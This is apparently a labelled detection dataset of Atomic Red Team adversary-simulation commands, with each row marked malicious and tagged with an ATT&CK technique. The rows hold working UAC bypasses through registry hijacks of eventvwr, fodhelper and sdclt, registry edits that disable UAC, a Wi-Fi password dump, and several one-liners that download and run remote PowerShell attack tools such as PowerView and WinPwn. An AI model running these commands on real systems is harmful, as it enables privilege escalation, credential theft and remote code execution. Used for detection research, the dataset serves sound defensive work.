/7,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1057/T1057.yaml,Launch Taskmgr from cmd to View running processes,T1057,"[""T1057""]",windows,0.9,False,"An adverary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system. [Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc5d615a874a5b0c030a03ca,"cmstp.exe /s ""#{inf_file_path}""","cmstp.exe /s ""#{inf_file_path}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.003/T1218.003.yaml,CMSTP Executing Remote Scriptlet,T1218.003,"[""T1218.003""]",windows,0.9,False,"Adversaries may supply CMSTP.exe with INF files infected with malicious commands ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c8193396e0170d967a021f81,"cmstp.exe /s ""#{inf_file_uac}"" /au","cmstp.exe /s ""#{inf_file_uac}"" /au",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.003/T1218.003.yaml,CMSTP Executing UAC Bypass,T1218.003,"[""T1218.003""]",windows,0.9,False,"Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc30b80f9aef0a478ebf935e,netsh wlan show profile * key=clear,netsh wlan show profile * key=clear,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016.002/T1016.002.yaml,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,T1016.002,"[""T1016.002""]",windows,0.9,False,"Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b07adc4d86d17fa09daa256d,"cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:""#{computer_name}"" quser qwinsta.exe /server:#{computer_name} qwinsta.exe for /F ""tokens=1,2"" %i in ('qwinsta /server:#{computer_name} ^| findstr ""Active Disc""') do @echo %i | find /v ""#"" | find /v ""console"" || echo %j > computers.txt @FOR /F %n in (computers.txt) DO @FOR /F ""tokens=1,2"" %i in ('qwinsta /server:%n ^| findstr ""Active Disc""') do @echo %i | find /v ""#"" | find /v ""console"" || echo %j > usernames.txt","cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:""#{computer_name}"" quser qwinsta.exe /server:#{computer_name} qwinsta.exe for /F ""tokens=1,2"" %i in ('qwinsta /server:#{computer_name} ^| findstr ""Active Disc""') do @echo %i | find /v ""#"" | find /v ""console"" || echo %j > computers.txt @FOR /F %n in (computers.txt) DO @FOR /F ""tokens=1,2"" %i in ('qwinsta /server:%n ^| findstr ""Active Disc""') do @echo %i | find /v ""#"" | find /v ""console"" || echo %j > usernames.txt",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Owner/User Discovery,T1033,"[""T1033""]",windows,0.9,False,"Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fc2999da538c5cdff278d816,users w who,users w who,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Owner/User Discovery,T1033,"[""T1033""]","linux,macos",0.9,False,"Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1188caea5cf7917cd9a32ff6,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,Find computers where user has session - Stealth mode (PowerView),T1033,"[""T1033""]",windows,0.9,False,"Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9e0702d3f871ba474f096575,[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append,[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt $env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,User Discovery With Env Vars PowerShell Script,T1033,"[""T1033""]",windows,0.9,False,Use the PowerShell environment variables to identify the current logged user.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ebe18c90afd655ed6e35c36,Remove-Item -Path .\CurrentactiveUser.txt -Force,Remove-Item -Path .\CurrentactiveUser.txt -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,User Discovery With Env Vars PowerShell Script,T1033,"[""T1033""]",windows,0.55,True,Use the PowerShell environment variables to identify the current logged user.,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6e2dd35784b65addcc00ff00,[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt,[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,GetCurrent User with PowerShell Script,T1033,"[""T1033""]",windows,0.9,False,"Use the PowerShell ""GetCurrent"" method of the WindowsIdentity .NET class to identify the logged user.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 11ac44fd114692cfdfb466c1,Remove-Item -Path .\CurrentUserObject.txt -Force,Remove-Item -Path .\CurrentUserObject.txt -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,GetCurrent User with PowerShell Script,T1033,"[""T1033""]",windows,0.55,True,"Use the PowerShell ""GetCurrent"" method of the WindowsIdentity .NET class to identify the logged user.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6ffc8600892e656c79860341,"$TokenSet = @{ U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ' N = [Char[]]'0123456789' } $Upper = Get-Random -Count 5 -InputObject $TokenSet.U $Number = Get-Random -Count 5 -InputObject $TokenSet.N $StringSet = $Upper + $Number $rad = (Get-Random -Count 5 -InputObject $StringSet) -join '' $file = ""rad"" + $rad + "".tmp"" whoami.exe /all >> #{output_path}\$file","$TokenSet = @{ U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ' N = [Char[]]'0123456789' } $Upper = Get-Random -Count 5 -InputObject $TokenSet.U $Number = Get-Random -Count 5 -InputObject $TokenSet.N $StringSet = $Upper + $Number $rad = (Get-Random -Count 5 -InputObject $StringSet) -join '' $file = ""rad"" + $rad + "".tmp"" whoami.exe /all >> #{output_path}\$file",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Discovery - SocGholish whoami,T1033,"[""T1033""]",windows,0.9,False,"SocGholish performs whoami discovery commands and outputs the results to a tmp file. The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp. Reference: https://redcanary.com/threat-detection-report/threats/socgholish/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 16a9daa596a9294a8acaf960,Remove-Item -Path #{output_path}\rad*.tmp -Force,Remove-Item -Path #{output_path}\rad*.tmp -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Discovery - SocGholish whoami,T1033,"[""T1033""]",windows,0.55,True,"SocGholish performs whoami discovery commands and outputs the results to a tmp file. The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp. Reference: https://redcanary.com/threat-detection-report/threats/socgholish/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ebc6ecf4d0b80e3b5c38e108,set file=#{output_file_path}\user_info_%random%.tmp echo Username: %USERNAME% > %file% echo User Domain: %USERDOMAIN% >> %file% net users >> %file% query user >> %file%,set file=#{output_file_path}\user_info_%random%.tmp echo Username: %USERNAME% > %file% echo User Domain: %USERDOMAIN% >> %file% net users >> %file% query user >> %file%,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Owner/User Discovery Using Command Prompt,T1033,"[""T1033""]",windows,0.9,False,Identify the system owner or current user using native Windows command prompt utilities.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 23bf6901590f1a7d490b4143,del #{output_file_path}\\user_info_*.tmp,del #{output_file_path}\\user_info_*.tmp,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1033/T1033.yaml,System Owner/User Discovery Using Command Prompt,T1033,"[""T1033""]",windows,0.55,True,Identify the system owner or current user using native Windows command prompt utilities.,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05af0c70421e894325259e7f,"reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ""#{executable_binary}"" /f cmd.exe /c eventvwr.msc","reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ""#{executable_binary}"" /f cmd.exe /c eventvwr.msc",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Event Viewer (cmd),T1548.002,"[""T1548.002""]",windows,0.9,False,"Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privileges. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d37a49c8d3a8ef847e846337,reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1,reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Event Viewer (cmd),T1548.002,"[""T1548.002""]",windows,0.55,True,"Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privileges. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a4a762b50ee2ea1288edf94d,"New-Item ""HKCU:\software\classes\mscfile\shell\open\command"" -Force Set-ItemProperty ""HKCU:\software\classes\mscfile\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\eventvwr.msc""","New-Item ""HKCU:\software\classes\mscfile\shell\open\command"" -Force Set-ItemProperty ""HKCU:\software\classes\mscfile\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\eventvwr.msc""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Event Viewer (PowerShell),T1548.002,"[""T1548.002""]",windows,0.9,False,"PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privalages ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f2debb60672e0dff4123fc29,"Remove-Item ""HKCU:\software\classes\mscfile"" -force -Recurse -ErrorAction Ignore","Remove-Item ""HKCU:\software\classes\mscfile"" -force -Recurse -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Event Viewer (PowerShell),T1548.002,"[""T1548.002""]",windows,0.55,True,"PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privalages ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c3ff39cf74e19dc86c4cd2b4,"reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d ""#{executable_binary}"" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v ""DelegateExecute"" /f fodhelper.exe","reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d ""#{executable_binary}"" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v ""DelegateExecute"" /f fodhelper.exe",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Fodhelper,T1548.002,"[""T1548.002""]",windows,0.9,False,"Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, ""The operation completed successfully."" will be shown twice and command prompt will be opened. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9ae461582ef128f416840056,reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1,reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Fodhelper,T1548.002,"[""T1548.002""]",windows,0.55,True,"Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, ""The operation completed successfully."" will be shown twice and command prompt will be opened. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 93d801e5bca1f5593a6909b0,"New-Item ""HKCU:\software\classes\ms-settings\shell\open\command"" -Force New-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""DelegateExecute"" -Value """" -Force Set-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\fodhelper.exe""","New-Item ""HKCU:\software\classes\ms-settings\shell\open\command"" -Force New-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""DelegateExecute"" -Value """" -Force Set-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\fodhelper.exe""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Fodhelper - PowerShell,T1548.002,"[""T1548.002""]",windows,0.9,False,"PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a536765a5b8122a480cf308,"Remove-Item ""HKCU:\software\classes\ms-settings"" -force -Recurse -ErrorAction Ignore","Remove-Item ""HKCU:\software\classes\ms-settings"" -force -Recurse -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using Fodhelper - PowerShell,T1548.002,"[""T1548.002""]",windows,0.55,True,"PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cdf9048fac71607884274bc6,"New-Item ""HKCU:\software\classes\ms-settings\shell\open\command"" -Force New-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""DelegateExecute"" -Value """" -Force Set-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\ComputerDefaults.exe""","New-Item ""HKCU:\software\classes\ms-settings\shell\open\command"" -Force New-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""DelegateExecute"" -Value """" -Force Set-ItemProperty ""HKCU:\software\classes\ms-settings\shell\open\command"" -Name ""(default)"" -Value ""#{executable_binary}"" -Force Start-Process ""C:\Windows\System32\ComputerDefaults.exe""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using ComputerDefaults (PowerShell),T1548.002,"[""T1548.002""]",windows,0.9,False,"PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8c2387cd3bc231d14deb53d3,"mkdir ""\\?\C:\Windows \System32\"" copy ""#{executable_binary}"" ""\\?\C:\Windows \System32\mmc.exe"" mklink c:\testbypass.exe ""\\?\C:\Windows \System32\mmc.exe""","mkdir ""\\?\C:\Windows \System32\"" copy ""#{executable_binary}"" ""\\?\C:\Windows \System32\mmc.exe"" mklink c:\testbypass.exe ""\\?\C:\Windows \System32\mmc.exe""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC by Mocking Trusted Directories,T1548.002,"[""T1548.002""]",windows,0.9,False,"Creates a fake ""trusted directory"" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6ea3b619da52d90e164d9e5f,"rd ""\\?\C:\Windows \"" /S /Q >nul 2>nul del ""c:\testbypass.exe"" >nul 2>nul","rd ""\\?\C:\Windows \"" /S /Q >nul 2>nul del ""c:\testbypass.exe"" >nul 2>nul",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC by Mocking Trusted Directories,T1548.002,"[""T1548.002""]",windows,0.55,True,"Creates a fake ""trusted directory"" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 175333c685be39fd271df260,"New-Item -Force -Path ""HKCU:\Software\Classes\Folder\shell\open\command"" -Value '#{command_to_execute}' New-ItemProperty -Force -Path ""HKCU:\Software\Classes\Folder\shell\open\command"" -Name ""DelegateExecute"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3","New-Item -Force -Path ""HKCU:\Software\Classes\Folder\shell\open\command"" -Value '#{command_to_execute}' New-ItemProperty -Force -Path ""HKCU:\Software\Classes\Folder\shell\open\command"" -Name ""DelegateExecute"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using sdclt DelegateExecute,T1548.002,"[""T1548.002""]",windows,0.9,False,"Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ad38e8cd7606df086b6dbd76,"Remove-Item -Path ""HKCU:\Software\Classes\Folder"" -Recurse -Force -ErrorAction Ignore","Remove-Item -Path ""HKCU:\Software\Classes\Folder"" -Recurse -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Bypass UAC using sdclt DelegateExecute,T1548.002,"[""T1548.002""]",windows,0.55,True,"Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a9151ff2cdc862d8d524c30b,reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC using reg.exe,T1548.002,"[""T1548.002""]",windows,0.9,False,"Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d4e78d87e11a5648c403f16b,reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f,reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC using reg.exe,T1548.002,"[""T1548.002""]",windows,0.55,True,"Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e98b524047fc3da0ecfe381f,powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore,powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,UACME Bypass Method 23,T1548.002,"[""T1548.002""]",windows,0.55,True,"Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Leo Davidson derivative Type: Dll Hijack Method: IFileOperation Target: \system32\pkgmgr.exe Component: DismCore.dll Implementation: ucmDismMethod UCM Method: UacMethodDISM https://github.com/hfiref0x",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f84e3946b387c1ecbb3f4731,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\cmd.exe"" -technique magic","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\cmd.exe"" -technique magic",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,WinPwn - UAC Magic,T1548.002,"[""T1548.002""]",windows,0.9,False,UAC bypass using Magic technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 15f8e20451a450a664f0ba7c,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\calc.exe"" -technique ccmstp","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\calc.exe"" -technique ccmstp",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,WinPwn - UAC Bypass ccmstp technique,T1548.002,"[""T1548.002""]",windows,0.9,False,UAC bypass using ccmstp technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac129ee576a03edc587d7456,"iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\cmd.exe"" -technique DiskCleanup","iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command ""C:\windows\system32\cmd.exe"" -technique DiskCleanup",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,WinPwn - UAC Bypass DiskCleanup technique,T1548.002,"[""T1548.002""]",windows,0.9,False,UAC bypass using DiskCleanup technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d3769a7656ae31aa16108a60,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1'),iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1'),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,WinPwn - UAC Bypass DccwBypassUAC technique,T1548.002,"[""T1548.002""]",windows,0.9,False,UAC Bypass DccwBypassUAC technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7fc28d93c85cb9150dd9c1e0,$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force,$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,T1548.002,"[""T1548.002""]",windows,0.9,False,"Disable User Account Conrol (UAC) for admin by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0. [MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), [Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), [Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ec1803501f49ae778db94d4,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force,Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1548.002/T1548.002.yaml,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,T1548.002,"[""T1548.002""]",windows,0.55,True,"Disable User Account Conrol (UAC) for admin by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0. [MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), [Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), [Avaddon 